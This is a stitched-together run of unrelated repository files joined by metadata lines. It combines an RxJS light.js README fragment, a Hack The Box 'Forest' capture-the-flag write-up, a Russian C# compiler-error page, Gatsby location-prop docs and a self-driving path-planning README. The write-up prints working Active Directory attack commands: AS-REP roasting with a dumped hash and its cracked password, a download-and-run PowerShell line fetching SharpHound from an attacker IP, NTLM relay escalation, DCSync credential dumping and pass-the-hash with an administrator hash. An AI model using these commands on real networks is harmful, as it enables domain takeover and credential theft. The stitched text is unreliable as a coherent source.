subscribers that don't subscribe at the same time. We have the following marble diagram (`^` denotes when the subscriber subscribes). ``` blockNumber$(): -----7----------8------9-----| subscriber1: -^---7----------8------9-----| subscriber2: ------------^7--8------9-----| subscriber3: --------------------------^9-| ``` Note: the default behavior for Observables is without PublishReplay, i.e. ``` blockNumber$(): -----7----------8------9-----| subscriber1: -^---7----------8------9-----| subscriber2: ------------^---8------9-----| subscriber3: --------------------------^--| ``` But Observables in this library are PublishReplay(1). [Read more](https://blog.angularindepth.com/rxjs-how-to-use-refcount-73a0c6619a4e) about PublishReplay. ### Observables are memoized ```javascript const obs1$ = balanceOf$('0x123'); const obs2$ = balanceOf$('0x123'); console.log(obs1$ === obs2$); // true const obs3$ = balanceOf$('0x456'); console.log(obs1$ === obs3$); // false ``` ### Underlying API calls are not unnessarily repeated ```javascript const obs1$ = balanceOf$('0x123'); const obs2$ = balanceOf$('0x123'); obs1$.subscribe(console.log); obs1$.subscribe(console.log); obs2$.subscribe(console.log); // Logs 3 times the balance // But only one call to `eth_getBalance` has been made const obs3$ = balanceOf$('0x456'); // Logs a new balance, another call to `eth_getBalance` is made ``` ### Underlying PubSub subscriptions are dropped when there's no subscriber ```javascript import { blockNumber$ } from '@parity/light.js'; const myObs$ = blockNumber$(); console.log(blockNumber$.frequency); // [onEveryBlock$] // Note: onEveryBlock$ creates a pubsub on `eth_blockNumber` const subscription = myObs$.subscribe(console.log); // Creates a pubsub subscription // Some other code... subscription.unsubscribe(); // Drops the pubsub subscription ``` ## TODO - Switch to TypeScript. - Have 100% test coverage.
28.099206
157
0.697642
eng_Latn
0.948447
bb1c51cad2eecdbcb3624edf8ecf852ab2c9dd08
3,077
md
Markdown
htb_box/_posts/2019-11-7-forest.md
cryptoderp/cryptoderp.github.io
34e87e226d9875ef078ffd4c04de700cfc00a742
[ "CC0-1.0" ]
null
null
null
htb_box/_posts/2019-11-7-forest.md
cryptoderp/cryptoderp.github.io
34e87e226d9875ef078ffd4c04de700cfc00a742
[ "CC0-1.0" ]
null
null
null
htb_box/_posts/2019-11-7-forest.md
cryptoderp/cryptoderp.github.io
34e87e226d9875ef078ffd4c04de700cfc00a742
[ "CC0-1.0" ]
null
null
null
--- layout: post title: Forest HTB categories: [HTB, Windows, AD] excerpt: Active Directory windows box abusing exchange as follows published: false --- # Forest - [Forest](#forest) - [Enumeration](#enumeration) - [Exploits - Work](#exploits---work) - [User](#user) - [PrivEsc](#privesc) - [Root](#root) ## Enumeration [Nmap-file](Forest--Enum.txt) Based on the name of the box I figured it had something to do with active directory. Running enum4linux against the host gave a list of users one of which was a service account ![](../img/2019-11-07-15-25-49.png) Using this service account we can use impacket to find any hashes for this user python /root/impacket/examples/GetNPUsers.py HTB/svc-alfresco -dc-ip 10.10.10.161 -no-pass Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation [*] Getting TGT for svc-alfresco $krb5asrep$23$svc-alfresco@HTB:70e1707a1f9d2a76c0481edd3876dfc4$9a0d6b38b42019f07106ed3a07b38c7b7279371f45b7cd6f663b4e1988fdcea71b3bafb296be917aeee74c162841487b04caf5bb8e3324413bc8b1d5c33943b24cdfa4cf8f761cc71d8aaefc7a4f4d4d0cb4d6bf741093d0b86339ae66cac63af74d7ae0c938a972bf446487e0ca6f25618020585badd304766f03dcad72a33389a3a6871c9a3837419365f4f03c804280f024fdca7c8d329abffd475827ddb43b29a1cce152b8e54340d9231ec9b28f03192012e9aff804d17d324e28634971a41d34aab4199712af379938d091e31e31b22a043e293224c89aa8967493cee4 Cracking this hash using john we get *s3rvice* ## Exploits - Work We now have an account we can use to access the server using Evil_Winrm. After connecting to the server it is time to enumerate the domain for what groups and permissions svc-alfresco has. ![](../img/2019-11-07-15-34-30.png) Time for bloodhound, bring on the hounds! iex (new-object net.webclient).DownloadString('http://10.10.15.xx/BloodHound/Ingestors/SharpHound.ps1') Invoke-Bloodhound -CollectionMethod All -Domain htb.local -LDAPUser svc-alfresco -LDAPPass s3rvice ![](../img/2019-11-07-15-36-59.png) Bloodhound shows a known vulnerability path for exploitation - [Abusing Exchange](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/) I added svc-alfresco to the "Exchange Windows Permissions" group. net group "Exchange Windows Permissions" svc-alfresco /ADD ![](../img/2019-11-07-15-40-56.png) Now all is set up for privesc.... ## PrivEsc With the svc-alfresco account in the right group I used the impacket tool 'nltmrelayx'. python ntlmrelay.py -t ldap://10.10.10.161 --escalate-user svc-alfresco ![](../img/2019-11-07-15-44-31.png) Browsing to the localhost in firefox the incoming credentials are relayed to the DC and the accounts privileges escalated. All that is left is dumping credentials using DCSYnc attack with secretsdump python secretsdump.py htb.local/[email protected] -just-dc ![](../img/2019-11-07-15-46-11.png) Boom! use the administrator hash to connect to the server as admin python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 [email protected] ![](../img/2019-11-07-15-47-23.png)
40.486842
516
0.780955
eng_Latn
0.762501
bb1ce076cea273552ba8da1e8402fd3847a4db11
1,261
md
Markdown
docs/csharp/misc/cs1593.md
judenethub/docs.ru-ru
2691f852cdf819d218b9eb62f52eb56a7f6658d9
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/csharp/misc/cs1593.md
judenethub/docs.ru-ru
2691f852cdf819d218b9eb62f52eb56a7f6658d9
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/csharp/misc/cs1593.md
judenethub/docs.ru-ru
2691f852cdf819d218b9eb62f52eb56a7f6658d9
[ "CC-BY-4.0", "MIT" ]
1
2021-10-31T15:06:56.000Z
2021-10-31T15:06:56.000Z
--- description: Ошибка компилятора CS1593 title: Ошибка компилятора CS1593 ms.date: 07/20/2015 f1_keywords: - CS1593 helpviewer_keywords: - CS1593 ms.assetid: 7476e799-8a8d-457d-b4e7-2d5e073799d8 ms.openlocfilehash: ccda29f9195c0e5b2c9a99fcec817f8eb53381c2 ms.sourcegitcommit: 5b475c1855b32cf78d2d1bbb4295e4c236f39464 ms.translationtype: MT ms.contentlocale: ru-RU ms.lasthandoff: 09/24/2020 ms.locfileid: "91176673" --- # <a name="compiler-error-cs1593"></a>Ошибка компилятора CS1593 Делегат "делегат" не принимает "число" аргументов Число аргументов, переданных при вызове [делегата](../language-reference/builtin-types/reference-types.md) , не совпадает с числом параметров, указанных в объявлении делегата. Следующий пример приводит к возникновению ошибки CS1593: ```csharp // CS1593.cs using System; delegate string func(int i); // declare delegate class a { public static void Main() { func dt = new func(z); x(dt); } public static string z(int j) { Console.WriteLine(j); return j.ToString(); } public static void x(func hello) { hello(8, 9); // CS1593 // try the following line instead // hello(8); } } ```
24.25
178
0.683584
kor_Hang
0.112135
bb1d432cd56d2a4f1ef295af08e6c88e657d21d9
95
md
Markdown
docs/connect/oledb/ole-db-date-time/index.md
strikersree/sql-docs
9ece10c2970a4f0812647149d3de2c6b75713e14
[ "CC-BY-4.0", "MIT" ]
2
2020-02-02T17:51:23.000Z
2020-10-17T02:37:15.000Z
docs/connect/oledb/ole-db-date-time/index.md
strikersree/sql-docs
9ece10c2970a4f0812647149d3de2c6b75713e14
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/connect/oledb/ole-db-date-time/index.md
strikersree/sql-docs
9ece10c2970a4f0812647149d3de2c6b75713e14
[ "CC-BY-4.0", "MIT" ]
6
2021-02-01T23:45:50.000Z
2021-02-04T21:16:27.000Z
--- redirect_url: /sql/connect/oledb/ole-db-date-time/date-and-time-improvements-ole-db ---
23.75
84
0.715789
eng_Latn
0.096264
bb1d7ded64526fbc51bad3f1160ffd15b31f1577
4,476
md
Markdown
docs/docs/location-data-from-props.md
waltercruz/gatsby
89a30e84f5f35c83a58a6a7277479ed70aef6d72
[ "MIT" ]
57,637
2015-06-28T12:31:47.000Z
2022-03-31T21:58:53.000Z
docs/docs/location-data-from-props.md
KhantParthkumarA/gatsby
c2d42ecc2dccc0862a4a0c796e2db9dec57fcb16
[ "MIT" ]
26,263
2015-06-22T22:26:14.000Z
2022-03-31T22:36:53.000Z
docs/docs/location-data-from-props.md
KhantParthkumarA/gatsby
c2d42ecc2dccc0862a4a0c796e2db9dec57fcb16
[ "MIT" ]
15,167
2015-07-28T17:27:07.000Z
2022-03-31T22:31:15.000Z
--- title: Location Data from Props --- ## What is location data Sometimes it can be helpful to know exactly what your app's browser URL is at any given stage. Because Gatsby uses [@reach/router](https://github.com/reach/router) for [client-side](/docs/glossary#client-side) routing, the `location` prop is passed to any page component and represents where the app is currently, where you'd like it to go, and other helpful information. The `location` object is never mutated but `reach@router` makes it helpful to determine when navigation happens. Here is a sample `props.location`: ```js { key: 'ac3df4', // does not populate with a HashHistory! pathname: '/somepage', search: '?someurlparam=valuestring1&anotherurlparam=valuestring2', hash: '#about', state: { [userDefined]: true } } ``` Note that you have to parse the `search` field (the [query string](https://developer.mozilla.org/en-US/docs/Web/API/URL/search)) into individual keys and values yourself. ### HashHistory Using `hash` in JavaScript is one way to update the browser URL and the DOM without having the browser do a full HTML page reload. HashHistory in `@reach/router` is used to track browser history with JavaScript when using [hashrouter](https://reacttraining.com/react-router/web/api/HashRouter) instead of [browserrouter](https://reacttraining.com/react-router/web/api/BrowserRouter) which uses the newer HTML5 `history` API. ### Getting the absolute URL of a page The `location` object's properties generally do not include the domain of your site, since Gatsby doesn't know where you will deploy it. Running [client side](/docs/glossary#client-side) is the exception to this rule. In this case, all the information your browser exposes as `window.location` is available. This includes `href` for the absolute URL of the page, including the domain. Sometimes you need the absolute URL of the current page (including the host name) while using [server-side rendering](/docs/glossary#server-side-rendering/). For example, you may want to add a canonical URL to the page header. In this case, you would first need to add configuration that describes where your site is deployed. You can add this as a `siteURL` property on `siteMetadata` in [`gatsby-config.js`](/docs/reference/config-files/gatsby-config/). Once you have added `siteURL`, you can form the absolute URL of the current page by retrieving `siteURL` and concatenating it with the current path from `location`. Note that the path starts with a slash; `siteURL` must therefore not end in one. ```jsx:title=src/pages/some-page.js import React from "react" import { graphql } from "gatsby" const Page = ({ location, data }) => { const canonicalUrl = data.site.siteMetadata.siteURL + location.pathname return <div>The URL of this page is {canonicalUrl}</div> } export default Page export const query = graphql` query PageQuery { site { siteMetadata { siteURL } } } ` ``` ## Use cases Through client-side routing in Gatsby you can provide a location object instead of strings, which are helpful in a number of situations: - Providing state to linked components - Client-only routes - Fetching data - Animation transitions ## Example of providing state to a link component ```jsx:title=index.js // usually you'd do this <Link to="/somepagecomponent"/> // but if you want to add some additional state <Link to={'/somepagecomponent'} state={{modal: true}} /> ``` Then from the receiving component you can conditionally render markup based on the `location` state. ```jsx:title=some-page-component.js const SomePageComponent = ({ location }) => { const { state = {} } = location const { modal } = state return modal ? ( <dialog className="modal">I'm a modal of Some Page Component!</dialog> ) : ( <div>Welcome to the Some Page Component!</div> ) } ``` ## Other resources - [Gatsby Link API](/docs/reference/built-in-components/gatsby-link/) - [@reach/router docs](https://reach.tech/router/api/Location) - [react-router location docs](https://github.com/ReactTraining/react-router/blob/master/packages/react-router/docs/api/location.md) - [Hash Router](https://reacttraining.com/react-router/web/api/HashRouter) - [Gatsby Breadcrumb Plugin](/plugins/gatsby-plugin-breadcrumb/#breadcrumb-props) - [Create Modal w/ Navigation State using React Router](https://codedaily.io/tutorials/47/Create-a-Modal-Route-with-Link-and-Nav-State-in-React-Router)
42.226415
519
0.744191
eng_Latn
0.98416
bb1dffde9f591ee7d8926ab42566720fccd18b45
11,327
md
Markdown
README.md
CamachoDejay/FRET-calculations
6fa8761593ba0dba7ddb571230cdd79a8308961b
[ "MIT" ]
1
2019-08-09T15:36:45.000Z
2019-08-09T15:36:45.000Z
README.md
CamachoDejay/FRET-calculations
6fa8761593ba0dba7ddb571230cdd79a8308961b
[ "MIT" ]
null
null
null
README.md
CamachoDejay/FRET-calculations
6fa8761593ba0dba7ddb571230cdd79a8308961b
[ "MIT" ]
2
2018-02-13T07:48:58.000Z
2020-02-01T23:11:01.000Z
# FRET-calculations This repository contains the code necessary to simulate the fluorescence emission of an anisotropic ensemble of GFP molecules when excited by polarized light. This simulation is part of the manuscript entitled: [2D polarization imaging as a low-cost fluorescence method to detect α-synuclein aggregation ex vivo in models of Parkinson’s disease.](https://www.nature.com/articles/s42003-018-0156-x) By Rafael Camacho, Daniela Täuber, Christian Hansen, Juanzi Shi, Luc Bousset, Ronald Melki, Jia-Yi Li, and Ivan G. Scheblykin. ![SimFig](https://media.springernature.com/lw900/springer-static/image/art%3A10.1038%2Fs42003-018-0156-x/MediaObjects/42003_2018_156_Fig1_HTML.png) [Figure 01: Definition of energy funneling efficiency ε (top panel) and calculations of the fluorescence anisotropy r and ε as functions of the distance between GFP molecules in a cubic lattice (bottom panel).](https://www.nature.com/articles/s42003-018-0156-x/figures/1) The homo-FRET Förster radius for GFP is 4.7 nm according to its spectral properties. On the right column pictograms of: a monomer, b dimer, c densely, and d loosely packed aggregates of α-syn-GFP. The monomer/dimer ratio indicates how many sites of the lattice are occupied by a monomer/dimer. Black arrows show the transition from the pure monomer to the pure dimer case. Error bars represent the standard deviation of the simulations when repeated 10 times. In the simulations we consider the presence of homo-FRET between GFP molecules. The simulation pipeline can be seen as: 1. Generation of dipole model 1. Dipole positions 2. Dipole orientations 3. calculation of the FRET rate between all dipoles 2. Generation of the polarization portrait 1. Calculation of the steady state transfer matrix 2. Calculation of the fluorescence intensity response 3. Calculation of the POLIM output from the polarization portrait * Version release-01, as used in the article. * [Website of the author](https://camachodejay.github.io/) ### How do I get set up? ### * Summary of set up: This is a Matlab repository. Thus, you will need to have a local Matlab installation. To run the code just run the main function. * Configuration: NA. * Dependencies: NA. ### Contribution guidelines ### * If you wish to contribute to this project please email the author. ### Who do I talk to? ### * If you ever encounter a problem feel free to contact the author [Website of the author](https://camachodejay.github.io/) * For information related to the article feel free to reach the author and/or [Prof. Ivan Scheblykin](http://www.chemphys.lu.se/research/groups/scheblykin-group/) ## Detailed information about the code ## The code is written using the object-oriented-programming capabilities of Matlab. There are 2 main objects: 1. +Dipole.dipole_model: This one contains all the information about dipole positions, orientations, and FRET rate between dipoles. 2. +Portrait.pol_portrait: This one calculates the steady state emission of the system after the FRET process has taken place. With that information it then calculates the polarization portrait for the model system. Once the portrait is known then we can calculate the POLIM parameters, such as, modulation depths and phases in excitation and emission, fluorescence anisotropy, and energy funnelling parameter - epsilon. ### How does the simulation work ### A _dipole model_ object contains the positions of all dipoles in the model system. The positions start with a **central dipole** in the origin (x: 0, y:0, z:0) surrounded by a large number of **buffer dipoles** in a cubic lattice, where all dipoles are randomly oriented. The **central dipole** is the dipole of interest for which the excitation/emission properties will be calculated. The **buffer dipoles** can be seen as a bath affecting the response of the **central dipole** depending on their positions/orientation. This means that each time we simulate a _dipole model_ the polarization portrait we obtain has fully polarized excitation (single absorbing dipole) and emission polarization that depends on the interaction between the **central dipole** and its **buffer**. If the **buffer dipoles** are far away (tens of nm) then they do not affect the **central dipole** and emission will also be fully polarized. On the other hand, if the **buffer dipoles** are very close (<4 nm), then the energy absorbed by the **central dipole** will be transferred and completely redistributed into the bath making the emission anisotropic. Now, in order to simulate the response coming from a set of randomly oriented dipoles (e.g. GFP in solution) many (thousands) of _dipole model_ iterations have to be done. This is because by adding together the response of many single_dipole-bath systems we obtain the response coming from a large set dipoles randomly orientated in the 3D. **What about the presence of dimmers?** to consider the effects of dimers in the polarization properties of the system we do the following: We randomly take a _fraction_ of the sites in the cubic lattice and replace their monomer by a _model dimer_. This _model dimer_ consists of two dipoles with the following properties: 1. The two dipoles are separated by a fixed distance (_dimer distance_). 2. The center of gravity of the _model dimer_ is set to the original cubic lattice position. 3. The relative orientation of the dipoles inside the dimer is random. 4. The position of the dipoles relative to their center of mass is also random. **How do we calculate the transfer rate between dipole?** We follow the classical FRET equations based in the distance/orientation and the spectral overlap between the donor and acceptor(s). For more details see information below. ### Dipole model ### * __Description__: Object that contains the positions, orientations and transfer matrix of all dipoles in the model system. The list of positions contains a central dipole in the origin surrounded by a large number of buffer dipoles in a cubic lattice. All dipoles are randomly oriented. There is the option of replacing the monomer sites by a dimer. * __Properties__: 1. *distance_model*: string that tells the object what kind of lattice we are going to build, 1D a line, 2D a plane, 3D a cube. 2. _buffer_: structure that contains information about buffer dipoles. `max_n_dipoles`: maximum number of dipoles in the system; `max_size` maximum desired size of the buffer in nm; `min_size`: minimum desired size of the buffer in nm. 3. *buffer_used*: size of the actual buffer used in nm. 4. _positions_: list of positions of all dipoles in the system in cartesian coordinates. 5. _orientations_: list of unitary vectors that point in the direction of the dipoles in the system. 6. *transfer_matrix*: matrix that contains the transfer rate between all dipoles in the system. Elements in the diagonal express how much light remains in the dipole and thus is emitted as fluorescence. Note that this matrix considers a _single step_ energy transfer process, it is not the steady state transfer matrix. 7. *central_dipole*: index of the central dipole in the positions/orientations matrices. * __Methods__: 1. _object constructor_ `D = Dipoles.dipole_model(dist_model, buffer);`: *dist_model* must be a string '1D', '2D' or '3D'. _buffer_ must be a structure with fields 'max_n_dipoles','max_size' and 'min_size'. size parameters are in units of nm. The object constructor returns an initialized dipole_model system. 2. *get_positions* `D = D.get_positions(inter_dist, dimer_prob)`: *inter_dist* double containing the inter chromophoric distance in nm; *dimer_prob* double with value between 0-1 that contains the probability for a site in the cubic lattice to contain a dimer instead of a monomer. It returns a dipole_model object with positions, buffer_used and central_dipole properties filled in. 3. *get_orientations* `D = D.get_orientations()`: If the dipole_model 'D'contains a list of positions then it returns a dipole_model object with orientations filled in. 4. *get_et_matrix* `D = D.get_et_matrix(FRETprops)`: *FRETprops* is a structure with fields 'J', 'extinction_coef', 'lifetime_donor', 'quantum_yield' and 'refractive_index'. If the dipole_model 'D' contains a list of positions and orientations then it returns a dipole_model object with et_matrix filled in. * __Detailed Explanation__ here I'm planning to explain each step of the code if possible. ### Polarization portrait ### * __Description__:Object that contains the polarization portrait and all the information needed to create it. This includes translation of the _one step_ transfer matrix into steady state emission after all transfer steps have taken place. * __Properties__: 1. *ex_angles_rad*: vector of doubles containing the discrete excitation angles in radians used to create the polarization portrait. 2. *em_angles_rad*: vector of doubles containing the discrete emission angles in radians used to create the polarization portrait. 3. *et_steps*: number of times _one step_ transfer matrix had to be used in order for all the initial excitation energy to decay via emission. In other words how many energy transfer steps the dipole model had. 4. *res_ener*: Our estimation for the steady state emission after FRET is a numerical calculation. This means that I keep doing ET steps until 'most' of the energy is gone via emission. *res_ener* keeps track of how much residual energy was left in the system when I stoped the calculation due to numerical reasons. 5. *I_ex_em*: polarization portrait, fluorescence intensity as function of the excitation and emission polarization angles. 6. *em_after_et*: Numerically estimated steady state emission after FRET for the central dipole. * __Methods__: 1. *object constructor* `P = Portrait.pol_portrait(dipole_model, portrait_prop)`: *dipole_model* must be a dipole model object with defined positions, orientations, and et_matrix; *portrait_prop* must be a structure with fields 'em_angles' and 'ex_angles', which should be each a 1xn array containing angles in degrees. The constructor then calculates the polarization portrait for the given dipole model (only the response of the central dipole!). 2. *display_portrait* `P.display_portrait()`: generates a new Matlab figure and plots (contour plot) the polarization portrait. * __Detailed Explanation__ here I'm planning to explain each step of the code if possible. ### POLIM calculation ### For a detailed explanation please follow the links below: * [Quantitative characterization of light-harvesting efficiency in single molecules and nanoparticles by 2D polarization microscopy: Experimental and theoretical challenges](https://www.sciencedirect.com/science/article/pii/S0301010412001000?via%3Dihub) * [Fluorescence polarization measures energy funneling in single light-harvesting antennas—LH2 vs conjugated polymers](https://www.nature.com/articles/srep15080) * [Polarization portraits of light-harvesting antennas: from single molecule spectroscopy to imaging](https://www.researchgate.net/publication/272357667_Polarization_portraits_of_light-harvesting_antennas_from_single_molecule_spectroscopy_to_imaging?channel=doi&linkId=54e31ef10cf2d618e195d3b1&showFulltext=true)
102.972727
732
0.791383
eng_Latn
0.99545
bb1e2bcbba75d2440cea419814271edf5c578f11
17,816
md
Markdown
README.md
YDS-FOREVER/Path-planning
dc45444bc5ecd59983ea443c5511ce44597837ff
[ "MIT" ]
null
null
null
README.md
YDS-FOREVER/Path-planning
dc45444bc5ecd59983ea443c5511ce44597837ff
[ "MIT" ]
null
null
null
README.md
YDS-FOREVER/Path-planning
dc45444bc5ecd59983ea443c5511ce44597837ff
[ "MIT" ]
null
null
null
#own: 这个工程环境按照很简单,依赖环境主要是这个文章后面的那几个。 仿真环境是依赖Unity3D.这个再unbuntu上按照的流程是: - a.下载linux的unity hub,然后双击运行,接着登录已经激活过的账号即可完成激活。 - b.按照unity3D,有两种方法: 第一、linux版本的在官网是没有提供的,需要到https://forum.unity.com/threads/unity-on-linux-release-notes-and-known-issues.350256/ 去下载,在2017版本前的都是有deb包的,在之后的都是通过下载下载【Linux Download Assistant】进行下载按照包的。直接双击运行即可,如果闪退,则是由于执行权限不够,解决方法: https://www.reddit.com/r/Unity3D/comments/7lvskb/is_there_any_way_to_get_the_editor_for_linux/ (需要科学上网),给assistant添加执行权限。 第二、是直接使用unityhub进行添加按照,不过这种按照速度比较慢。推荐使用第一种。 注意点: 1.千万不要尝试再Windows上去调通,因为基本没有调通的希望,其依赖很多都需要再wins上下载源码,然后进行生成依赖库,这个会崩溃的。自己调试了N天,没结果。 而再ubuntu上一下子就弄好了 2.千万不要在虚拟机上,因为unity3d安装完后执行会闪退。 # CarND-Path-Planning-Project Self-Driving Car Engineer Nanodegree Program Video : &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [![Project Video](https://img.youtube.com/vi/6qxCNcYnzPo/0.jpg)](https://www.youtube.com/watch?v=6qxCNcYnzPo) ### Goals In this project, your goal is to safely navigate around a virtual highway with other traffic that is driving +-10 MPH of the 50 MPH speed limit. You will be provided the car's localization and sensor fusion data, there is also a sparse map list of waypoints around the highway. The car should try to go as close as possible to the 50 MPH speed limit, which means passing slower traffic when possible, note that other cars will try to change lanes too. The car should avoid hitting other cars at all cost as well as driving inside of the marked road lanes at all times unless going from one lane to another. The car should be able to make one complete loop around the 6946m highway. Since the car is trying to go 50 MPH, it should take a little over 5 minutes to complete 1 loop. Also, the car should not experience total acceleration over 10 m/s^2 and jerk that is greater than 10 m/s^3. ## Path planning in self-driving cars Path planning and decision making for autonomous vehicles in urban environments enable self-driving cars to find the safest, most convenient, and most economically beneficial routes from point A to point B. Finding routes is complicated by all of the static and maneuverable obstacles that a vehicle must identify and bypass. Today, the major path planning approaches include the predictive control model, feasible model, and behavior-based model. Let’s first get familiar with some terms to understand how these approaches work. * A path is a continuous sequence of configurations beginning and ending with boundary configurations. These configurations are also referred to as initial and terminating. * Path planning involves finding a geometric path from an initial configuration to a given configuration so that each configuration and state on the path is feasible (if time is taken into account). * A maneuver is a high-level characteristic of a vehicle’s motion, encompassing the position and speed of the vehicle on the road. Examples of maneuvers include going straight, changing lanes, turning, and overtaking. * Maneuver planning aims at taking the best high-level decision for a vehicle while taking into account the path specified by path planning mechanisms. * A trajectory is a sequence of states visited by the vehicle, parameterized by time and, most probably, velocity. * Trajectory planning or trajectory generation is the real-time planning of a vehicle’s move from one feasible state to the next, satisfying the car’s kinematic limits based on its dynamics and as constrained by the navigation mode. <p align="center"> This is the general view of self driving autonomous system integration : <img src="documentation/self_driving_cars.png" width="50%" height="50%"> </p> <p align="center"> The blocks inside the container are the parts of the path planning procedure; <img src="documentation/self_driving_cars2.png" width="50%" height="50%"> </p> ### Trajectory generation : For each efficient target, we compute the corresponding trajectory. We send commands to the controller as a set of waypoints, i.e., discrete points (supposedly closed to one another) spread across the trajectory, often at a fixed interval equal to the controller's sampling time. <p align="center"> <img src="documentation/trajectoryGeneration.png" width="50%" height="50%"> </p> For my project the trajectory is generated using cubic spline with four points : *(Note : This explanation is in Frenet coordinates, we use the variables s and d to describe a vehicle’s position on the road. The s coordinate represents distance along the road (also known as longitudinal displacement) and the d coordinate represents side-to-side position on the road (also known as lateral displacement).And **r** value is the width of the road (in meters)* . * Current position (s, d) * Desired lane (s+30, r*lane+(r/2)) * Desired lane (s+60, r*lane+(r/2)) * Desired lane (s+90, r*lane++(r/2)) The controller then has to regenerate trajectory segments between two consecutive waypoints, such that manipulator reaches the next waypoint within the fixed time interval while staying within joint limits, velocity limits, and acceleration limits. However, the controller does not really consider even collision avoidance or anything else ### Prediction: <p align="center"> <img src="documentation/prediction.png" width="50%" height="50%"> </p> We predict situations in over environment in order to able decision that will get you to the destination safely and efficiently For this project I've to build collision detection, that predicts possible collision with two cars. ### Behavior: <p align="center"> <img src="documentation/behavior.png" width="50%" height="50%"> </p> Behavior planner takes input : * map of the world, * route to the destination * prediction about what static and dynamic obstacles are likely to do Output: Suggested maneuver for the vehicle which the trajectory planner is responsible for reaching collision-free, smooth and safe trajectory. # Behavior Tree A Behavior Tree (BT) is a mathematical model of plan execution used in computer science, robotics, control systems, and video games. They describe switchings between a finite set of tasks in a modular fashion. Their strength comes from their ability to create very complex tasks composed of simple tasks, without worrying how the simple tasks are implemented. BTs present some similarities to hierarchical state machines with the key difference that the main building block of behavior is a task rather than a state. Its ease of human understanding make BTs less error-prone and very popular in the game developer community. BTs have been shown to generalize several other control architectures. ## Pros of using Behavior trees * Useful when we have so many transitions and states * Transform hardly-visible state machine into the hierarchical system * Encapsulate and separate conditional tasks into classes * Easy automation tests for each task. * Better when pass/fail of tasks is central * Reusability * Appearance of goal-driven behavior * Multi-step behavior * Fast * Recover from errors ## Cons of using Behavior trees * Clunky for state-based behavior * Changing behavior based on external changes * Isn’t really thinking ahead about unique situations * Only as good as the designer makes it (just follows the recipes) ## Composite Node A composite node is a node that can have one or more children. They will process one or more of these children in either a first to last sequence or random order depending on the particular composite node in question, and at some stage will consider their processing complete and pass either success or failure to their parent, often determined by the success or failure of the child nodes. During the time they are processing children, they will continue to return Running to the parent. ## Leaf These are the lowest level node type and are incapable of having any children. Leaves are however the most powerful of node types, as these will be defined and implemented for your intelligent system to do the actions and behaviors specific or character specific tests or actions required to make your tree actually do useful stuff. A leaf node can be a **condition** or an **Task(Action)**. ### Condition A condition can return true for success and false otherwise. ### Task The task can return true if it is completed, false, otherwise. ## Sequences The simplest composite node found within behaviour trees, their name says it all. A sequence will visit each child in order, starting with the first, and when that succeeds will call the second, and so on down the list of children. If any child fails it will immediately return failure to the parent. If the last child in the sequence succeeds, then the sequence will return success to its parent. It's important to make clear that the node types in behavior trees have quite a wide range of applications. The most obvious use of sequences is to define a sequence of tasks that must be completed in entirety, and where the failure of one means further processing of that sequence of tasks becomes redundant. In the example below is an example of Selector hierarchy, as a part of my behavioral tree used for the path planning project : <p align="center"> <img src="/documentation/sequence.png"> </p> Execution: The main goal of this selector is to choose left child (detecting whether we have a car very close before us, and adapt the speed accordingly) or right child (drive normally) This selector will return true if and only if all children return true according to the ordered steps of execution : 1. The car is in second lane (IsCurrentLane condition returns true/false) 1. (If this block return false, then we don't continue examining the rest of the blocks in this sequence) 1. It is safe to switch lane (SafeToSwitchLane condition returns true) 1. (if this block return false, then we don't continue examining the rest of the blocks in this sequence) 1. Successfully perform the switch task (SwitchLane task is successfully executed, returns true) 1. -----> Goal achieved ## Selector Where a sequence is an AND, requiring all children to succeed to return success, a selector will return success if any of its children succeed and not process any further children. It will process the first child, and if it fails will process the second, and if that fails will process the third, until success is reached, at which point it will instantly return success. It will fail if all children fail. This means a selector is analogous with an OR gate, and as a conditional statement can be used to check multiple conditions to see if anyone of them is true. In the example below is an example of Sequence hierarchy, as a part of my behavioral tree used for the path planning project : <p align="center"> <img src="documentation/selector.png" width="50%" height="50%"> </p> Execution: The main goal of this selector is to choose left child (detecting whether we have car very close before us, and adapt the speed accordingly) or right child (drive normally) This selector will return true only if one of its children returns true, execution is according to the following steps : 1. Left Child (Sequence): Returns true if there is car close before us and we are able to adapt our speed 1. Is there a car close in front of us 1. (If this block return false, then we don't continue examining the rest of the blocks in this sequence) 1. Approximate speed 1. (If this block return false, then we don't continue examining the rest of the blocks in this sequence) 1. Drive 1. (If Left Child return true, then we don't continue examining the rest of the blocks in this selector) 1. Right Child (Task) 1. Drive normally ## Priority Selector Very simple, It's the same as a selector but this time they are ordered somehow. If the priority selector is used, child behaviors are ordered in a list and tried one after another. For this project, I used a priority selector to select and prioritize which of the lanes we should drive/switch. Below there is a picture describing this behavior : <p align="center"> <img src="documentation/prioritySelector.png"> </p> ### Prioritization equiation and estimation For this project I prioritize which of the lanes we should drive/switch based on following formula : <p align="center"> <img src="documentation/formula.png"> </p> The Bigger the reward is and smaller the penalty, priority for visiting the lane increases. # Behavior Tree Architecture for Path Planing Bellow is the complete Path planning behavior tree architecture : <p align="center"> <img src="documentation/BehaviorTree.png"> </p> # Installation ### Simulator. You can download the Term3 Simulator which contains the Path Planning Project from the [releases tab (https://github.com/udacity/self-driving-car-sim/releases/tag/T3_v1.2). To run the simulator on Mac/Linux, first make the binary file executable with the following command: ```shell sudo chmod u+x {simulator_file_name} ``` #### The map of the highway is in data/highway_map.txt Each waypoint in the list contains [x,y,s,dx,dy] values. x and y are the waypoint's map coordinate position, the s value is the distance along the road to get to that waypoint in meters, the dx and dy values define the unit normal vector pointing outward of the highway loop. The highway's waypoints loop around so the frenet s value, distance along the road, goes from 0 to 6945.554. ## Basic Build Instructions 1. Clone this repo. 2. Make a build directory: `mkdir build && cd build` 3. Compile: `cmake .. && make` 4. Run it: `./path_planning`. Here is the data provided from the Simulator to the C++ Program #### Main car's localization Data (No 